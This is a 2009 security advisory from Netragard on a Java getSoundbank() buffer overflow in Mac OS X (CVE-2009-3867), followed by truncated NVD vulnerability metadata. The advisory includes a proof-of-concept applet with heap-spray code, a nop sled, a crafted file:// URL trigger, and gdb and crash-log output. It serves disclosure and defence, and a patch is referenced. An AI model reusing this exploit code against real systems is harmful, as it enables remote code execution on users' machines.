\nProduct Version : < Java for Mac OS X 10.6 Update 1 \nVendor Name : http://www.apple.com, http://www.sun.com \nType of Vulnerability : Buffer Overflow \nImpact : Arbitrary Code Execution \nVendor Notified : Yes \nPatch Released : http://support.apple.com/kb/HT3969 \nDiscovery Date : 11/13/2009 \n \n[POSTING NOTICE] \n----------------------------------------------------------------------- \nIf you intend to post this advisory on your web-site you must provide \na clickable link back to http://www.netragard.com. The contents of \nthis advisory may be updated without notice. \n \n[Product Description] \n----------------------------------------------------------------------- \nMac OS X is the only major consumer operating system that comes complete \nwith a fully configured and ready-to-use Java runtime and development \nenvironment. Professional Java developers are increasingly turning to \nthe feature-rich Mac OS X as the operating system of choice for both \nMac-based and cross-platform Java development projects. Mac OS X \nincludes \nthe full version of J2SE 1.5, pre-installed with the Java Development \nKit (JDK) and the HotSpot virtual machine (VM), so you don't have to \ndownload, install, or configure anything. \n \nDeploying Java applications on Mac OS X takes advantage of many built-in \nfeatures, including 64-bit support, resolution independence, automatic \nsupport of multiprocessor hardware, native support for the Java \nAccessibility API, and the native Aqua look and feel. As a result, \nJava applications on Mac OS X look and perform like native applications \non Mac OS X. \n \n \n[Technical Summary] \n----------------------------------------------------------------------- \nOn November 4th, 2009 ZDI-09-076 was released and subsequently credited \nto 'Anonymous'. Given the historic track record with regards to lagging \nbehind 3rd party \"coordinated\" disclosures we decided to validate \nwether or not OSX was vulnerable in its current state. More importantly \nwe wanted to validate that the vulnerable classes were reachable via \nstandard web browser. \n \nThe ZDI release contained limited information but that didn't prevent \nus from creating a working Proof of Concept (\"PoC\") for this issue. \n \nAs previously mentioned, the prime reason that we decided to look into \nthis \nvulnerability was because we suspected that it was possible to remotely \ntrigger and exploit the risk via the Safari Web Browser. We were right. \n \nThe easiest way to validate this was to find an example applet that used \nthe getSoundbank() function and then to modify \nit. \n \nA quick glance at the Sun manual page gave us a hint as to how to \nuse the function. \n \nhttp://java.sun.com/j2se/1.3/docs/api/javax/sound/midi/MidiSystem.html#getSoundbank(java.net.URL) \n \npublic static Soundbank getSoundbank(URL url) \nthrows InvalidMidiDataException, IOException \nConstructs a Soundbank by reading it from the specified URL. \nThe URL must point to a valid MIDI soundbank file. \n \nParameters: \nurl - the source of the sound bank data \n \nReturns: \nthe sound bank \n \nThrows: \nInvalidMidiDataException - if the URL does not point to valid MIDI \nsoundbank data recognized by the system \nIOException - if an I/O error occurred when loading the soundbank \n \nWe used a google query to find an example: \nhttp://www.google.com/search?hl=en&source=hp&q=javax.sound.midi+getSoundbank+applet&aq=f&oq=&aqi= \n \nLuckily the example was an applet which eliminates the question of \naccessibility to the vulnerability via applet tag. \n \nhttp://music.columbia.edu/pipermail/jmsl/2004-November/000555.html \n \nIf you modify the above code example we can trigger the bug and get \nand some additional information about it. \n \nAll of the testing below was done with appletviewer and the following \nhtml page, coupled with our compiled proof of concept class. \n \n$ cat index.html \n<title> getSoundBank pwn </title> \n</head><body> \n \n<applet code=\"test.class\" width=\"150\" height=\"25\"> \n</applet> \n \n \n[Technical Details] \n----------------------------------------------------------------------- \nhttp://www.zerodayinitiative.com/advisories/ZDI-09-076/ tells us there \nis a 'vulnerability [that] allows remote attackers to execute arbitrary \ncode on vulnerable installations of Sun Microsystems Java.' \n \nZDI also states that 'The specific flaw exists in the parsing of \nlong file:// URL arguments to the getSoundbank() function.' and that \n'Exploitation of this vulnerability can lead to system compromise under \nthe credentials of the currently logged in user.' \n \nThe code shown below in the Proof of Concept section allows us to \nvalidate \nthe statements made by ZDI by triggering the bug and subsequently \ncrashing \nthe JVM. \n \nWhen the JVM crashes it leaves a log behind in the /Library/Logs/Java \nfolder that provides useful information. \n \n$ ls /Library/Logs/Java/ \nJavaNativeCrash_pid1815.crash.log \n \nOne of the important things recorded to the log is the address of \nthe JVM's heap. Since a heap spray is used to place shellcode at \na usable address this is quite useful. \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n \nJava information: \nVersion: Java HotSpot(TM) Client VM (1.5.0_13-119 mixed mode, sharing) \nVirtual Machine version: Java HotSpot(TM) Client VM (1.5.0_13-119) for \\ \nmacosx-x86, built on Sep 28 2007 23:59:21 by root with gcc 4.0.1 \n(Apple \\ \nInc. build 5465) \n \nException type: Bus Error (0xa) at pc=0x1755c81b \n \nCurrent thread (0x0100e010): JavaThread \"thread applet-test.class\"\\ \n[_thread_in_native, id=9097216] \n \nStack: [0xb0d97000,0xb0e17000) \nJava frames: (J=compiled Java code, j=interpreted, Vv=VM code) \nj com.sun.media.sound.HeadspaceSoundbank.nOpenResource(Ljava/lang/ \nString;)J+0 \nj com.sun.media.sound.HeadspaceSoundbank.initialize(Ljava/lang/ \nString;)V+7 \nj com.sun.media.sound.HeadspaceSoundbank.<init>(Ljava/net/URL;)V+89 \nj com.sun.media.sound.HsbParser.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+5 \nj javax.sound.midi.MidiSystem.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+36 \nj test.init()V+339 \nj sun.applet.AppletPanel.run()V+197 \nj java.lang.Thread.run()V+11 \nv ~StubRoutines::call_stub \nJava Threads: ( => current thread ) \n0x01011980 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9269760] \n0x01011790 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9266176] \n0x01011310 JavaThread \"AWT-EventQueue-1\" [_thread_blocked, \nid=9249792] \n0x01001440 JavaThread \"DestroyJavaVM\" [_thread_blocked, \nid=-1333784576] \n0x0100e210 JavaThread \"AWT-EventQueue-0\" [_thread_blocked, \nid=9107968] \n=>0x0100e010 JavaThread \"thread applet-test.class\" [_thread_in_native, \nid=9097216] \n0x0100cb90 JavaThread \"Java2D Disposer\" daemon [_thread_blocked, \nid=9035264] \n0x0100bda0 JavaThread \"AWT-Shutdown\" [_thread_blocked, id=8834048] \n0x0100b900 JavaThread \"AWT-AppKit\" daemon [_thread_in_native, \nid=-1607766176] \n0x01009050 JavaThread \"Low Memory Detector\" daemon \n[_thread_blocked, id=8411136] \n0x01008580 JavaThread \"CompilerThread0\" daemon [_thread_blocked, \nid=8506880] \n0x01008120 JavaThread \"Signal Dispatcher\" daemon [_thread_blocked, \nid=8503296] \n0x01007810 JavaThread \"Finalizer\" daemon [_thread_blocked, \nid=8483840] \n0x01007570 JavaThread \"Reference Handler\" daemon [_thread_blocked, \nid=8480256] \nOther Threads: \n0x01006cc0 VMThread [id=8476672] \n0x01009c50 WatcherThread [id=8414720] \n \nVM state:not at safepoint (normal execution) \nVM Mutex/Monitor currently owned by a thread: None \n \nHeap \ndef new generation total 4544K, used 3238K [0x25580000, \n0x25a60000, 0x25a60000) \neden space 4096K, 79% used [0x25580000, 0x258a9b30, 0x25980000) \nfrom space 448K, 0% used [0x259f0000, 0x259f0000, 0x25a60000) \nto space 448K, 0% used [0x25980000, 0x25980000, 0x259f0000) \ntenured generation total 60544K, used 60028K [0x25a60000, \n0x29580000, 0x29580000) \nthe space 60544K, 99% used [0x25a60000, 0x294ff048, 0x294ff200, \n0x29580000) \ncompacting perm gen total 8192K, used 1093K [0x29580000, \n0x29d80000, 0x2d580000) \nthe space 8192K, 13% used [0x29580000, 0x29691698, 0x29691800, \n0x29d80000) \nro space 8192K, 63% used [0x2d580000, 0x2da96c48, 0x2da96e00, \n0x2dd80000) \nrw space 12288K, 43% used [0x2dd80000, 0x2e2af088, 0x2e2af200, \n0x2e980000) \n \nVirtual Machine arguments: \nJVM args: -Dapplication.home=/System/Library/Frameworks/ \nJavaVM.framework/Versions/1.5.0/Home \nJava command: sun.applet.Main /Users/hostile/Desktop/index.html \nlauncher type: SUN_STANDARD \n \nNote: The heap within appletviewer is located at '0x25580000' \n \nWhen triggered with Safari the Heap location is slightly different \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n... \nHeap \ndef new generation total 6848K, used 5542K [0x1a270000, \n0x1a9d0000, 0x1a9d0000) \n... \n \nIn that particular trace the Safari Java heap was located at 0x1a270000. \n \nThe PoC provided below instructs appletviewer to land in a nopsled. \nFuther \nresearch will yield a functional exploit. In essence this code sprays \nthe \nheap in order to place attacker controlled code at the proper address \nrange \nwithin the heap. With several stack frames under control it is \npossible to \ncontrol the flow of execution. Control of an eax address is what leads \nto \nfinal code execution. \n \n0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>:\\ \ncall *0x2a8(%eax) \n \n \n[Proof Of Concept] \n----------------------------------------------------------------------- \n \n/* \n \nWe should only need safe shellcode at this point. \n \nInvalid memory access of location 00000000 eip=256823b6 \n \nProgram received signal EXC_BAD_ACCESS, Could not access memory. \nReason: KERN_PROTECTION_FAILURE at address: 0x00000000 \n[Switching to process 561 thread 0x15107] \n0x256823b6 in ?? () \n(gdb) bt \n#0 0x256823b6 in ?? () \n#1 0x188fd821 in \nJava_com_sun_media_sound_HeadspaceSoundbank_nOpenResource () \n#2 0x25582126 in ?? () \nPrevious frame inner to this frame (gdb could not unwind past this \nframe) \n \n(gdb) x/6x 0x256823b6-12 \n0x256823aa: 0x90909090 0x90909090 0x90909090 0x00333031 \n0x256823ba: 0x00330032 0x00010033 \n \nWe only crash because we ran out of code to execute... \n(gdb) x/i $eip \n0x256823b6: xor %esi,(%eax) \n(gdb) i r $esi $eax \nesi 0x0 0 \neax 0x0 0 \n \nnotice that frame 1's eip of 0x188fd821 is AFTER the call to eax at \n0x1891a81b \n \n(gdb) x/10i$eip \n0x1891a803 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+84>: mov (%edx),%eax \n0x1891a805 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+86>: mov 0x10(%ebp),%edx \n0x1891a808 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+89>: mov %edi,0x8(%esp) \n0x1891a80c <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+93>: mov %esi,%edi \n0x1891a80e <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+95>: sar $0x1f,%edi \n0x1891a811 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+98>: mov %edx,0x4(%esp) \n0x1891a815 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+102>: mov 0x8(%ebp),%edx \n0x1891a818 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+105>: mov %edx,(%esp) \n0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>: call *0x2a8(%eax) \n0x1891a821 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+114>: add $0x450,%esp \n \n*/ \nimport javax.sound.midi.*; \nimport java.io.*; \nimport java.net.*; \n \nimport java.awt.Graphics; \npublic class test extends java.applet.Applet \n{ \npublic static Synthesizer synth; \nSoundbank soundbank; \n \npublic void init() \n{ \nString fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581 \nJava(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13- \nb05-237) \n \n// heap sprayed info starts at 0x25580000+12 but keep in mind we \nneed to be fairly ascii safe. \n// 0x20 is not usable \nbyte[] frame = { \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp \n(byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx \n}; \n \nString mal = new String(frame); \n \n//System.out.println(mal); \n \nfName = \"file://\" + fName + mal; \ntry \n{ \nsynth = MidiSystem.getSynthesizer(); \nsynth.open(); \nSystem.out.println(\"Spray heap\\n\"); \n \nString shellcode = \"\\u41424344\" + repeat('\\u9090',1000) + \n\"\\u30313233\"; // This is just a nop sled with some heading and \ntrailing markers. \nint mb = 1024; \n \n// Sotirov / Dowd foo follows. \n// http://taossa.com/archive/bh08sotirovdowd.pdf \n \n// Limit the shellcode length to 100KB \nif (shellcode.length() > 100*1024) \n{ \nthrow new RuntimeException(); \n} \n// Limit the heap spray size to 1GB, even though in practice the \nJava \n// heap for an applet is limited to 100MB \nif (mb > 1024) \n{ \nthrow new RuntimeException(); \n} \n// Array of strings containing shellcode \nString[] mem = new String[1024]; \n \n// A buffer for the nop slide and shellcode \nStringBuffer buffer = new StringBuffer(1024*1024/2); \n \n// Each string takes up exactly 1MB of space \n// \n// header nop slide shellcode NULL \n// 12 bytes 1MB-12-2-x x bytes 2 bytes \n \n// Build padding up to the first exception. We will need to set \nthe eax address after this padding \n// First usable addresses begin at 0x25580000+0x2121. Unfortunately \n0x20 in our addresses caused issues. \n// 0x2121 is 8481 in decimal, we subtract a few bytes for munging. \n \nfor (int i = 1; i < (8481/2)-4; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// (gdb) x/10a 0x25582122-4 \n// 0x2558211e: 0x48484848 0x20202020 0x20202020 0x20202020 \n// 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020 \n// 0x2558213e: 0x20202020 0x20202020 \n \n// Set the call address \n// 0x188fd81b \n<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>: \ncall *0x2a8(%eax) \n \nbuffer.append('\\u2122'); \nbuffer.append('\\u2558'); \n \n// 0x2a8 is 680 in decimal, once again we need filler for making \nthis a usable address location. \nfor (int i = 1; i < (680/2)-1; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// where do we wanna go? 0x25582525 is right in the middle of the \nfollowing nop sled \n// (gdb) x/5x 0x25582525 \n// 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090 \n// 0x25582535: 0x90909090 \n \nbuffer.append('\\u2525'); \nbuffer.append('\\u2558'); \n \n// We are gonna place the shellcode after this so simply fill \nin remaining space with nops! \nfor (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++) \n{ \nbuffer.append('\\u9090'); \n} \n \n// Append the shellcode \nbuffer.append(shellcode); \n \n// Run the garbage collector \nRuntime.getRuntime().gc(); \n \n// Fill the heap with copies of the string \ntry \n{ \nfor (int i=0; i<mb; i++) \n{ \nmem[i] = buffer.toString(); \n} \n} \ncatch (OutOfMemoryError err) \n{ \n// do nothing \n} \n \n// Trigger the stack overflow. \nsynth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName))); \n} \ncatch(Exception e) \n{ \nSystem.out.println(e); \n} \n} \npublic void paint(Graphics g) \n{ \ng.drawString(\"Hello pwned!\", 50, 25); \n} \npublic static String repeat(char c,int i) \n{ \nString tst = \"\"; \nfor(int j = 0; j < i; j++) \n{ \ntst = tst+c; \n} \nreturn tst; \n} \n} \n \n[Fix] \n----------------------------------------------------------------------- \nhttp://support.apple.com/kb/HT3969 \nhttp://java.sun.com/javase/6/webnotes/ReleaseNotes.html \nhttp://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1 \n \n[Vendor Status] \n----------------------------------------------------------------------- \nVendor Notified and issue has been Patched \n \n[Vendor Comments] \n----------------------------------------------------------------------- \nJava for Mac OS X 10.6 Update 1 is now available and addresses the \nfollowing: \n \nCVE-ID: CVE-2009-3869, CVE-2009-3871, CVE-2009-3875, CVE-2009-3874, \nCVE-2009-3728, CVE-2009-3872, CVE-2009-3868, CVE-2009-3867, \nCVE-2009-3884, \nCVE-2009-3873, CVE-2009-3877, CVE-2009-3865, CVE-2009-3866 \n \nAvailable for: Mac OS X v10.6.2 and later, Mac OS X Server v10.6.2 and \nlater \n \nImpact: Multiple vulnerabilities in Java 1.6.0_15 \n \nDescription: Multiple vulnerabilities exist in Java 1.6.0_15, the most \nserious of which may allow an untrusted Java applet to obtain elevated \nprivileges. \n \nVisiting a web page containing a maliciously crafted untrusted Java \napplet \nmay lead to arbitrary code execution with the privileges of the \ncurrent user. \nThese issues are addressed by updating to Java version 1.6.0_17. Further \ninformation is available via the Sun Java website Credit to Kevin \nFinisterre \nof Netragard for reporting CVE-2009-3867 to Apple. \n \n[Why] \n----------------------------------------------------------------------- \nWe are often asked \"why do you do what you do?\". The answer is that \nour research helps to educate people about risks that affect them that \nmight otherwise go unnoticed. Often times our research ends up plugging \nholes that might end up resulting in a successful compromise if left \nunchecked. Want proof? Take a look at some of the comments taken \nfrom the article below: \n \nhttp://www.theregister.co.uk/2009/12/04/mac_windows_java_attack/ \n \nComment 1: Ben Lambert writes \n----------------------------- \n\"Oh that's just wonderful. So I can't update my \nmachines to a newer Java version because it breaks my critical app.. \n..or i can get exploited. I love my job.\" \n \nComment 2: windywoo wrote \n------------------------- \n\"This article was the first I heard about the patch so I checked \nSoftware Update and there it was.\" \n \n \n[Disclaimer] \n----------------------http://www.netragard.com------------------------- \nNetragard, L.L.C. assumes no liability for the use of the information \nprovided in this advisory. This advisory was released in an effort to \nhelp the I.T. community protect themselves against a potentially \ndangerous security hole. This advisory is not an attempt to solicit \nbusiness. \n \n<a href=\"http://www.netragard.com> \nhttp://www.netragard.com \n</a> \n \n \n \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84499/NETRAGARD-20091219.txt"}], "cve": [{"lastseen": "2021-02-02T05:40:06", "description": "Stack-based buffer overflow in the setDiffICM function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a crafted argument, aka Bug Id 6872357.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3869", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3869"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3869", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", 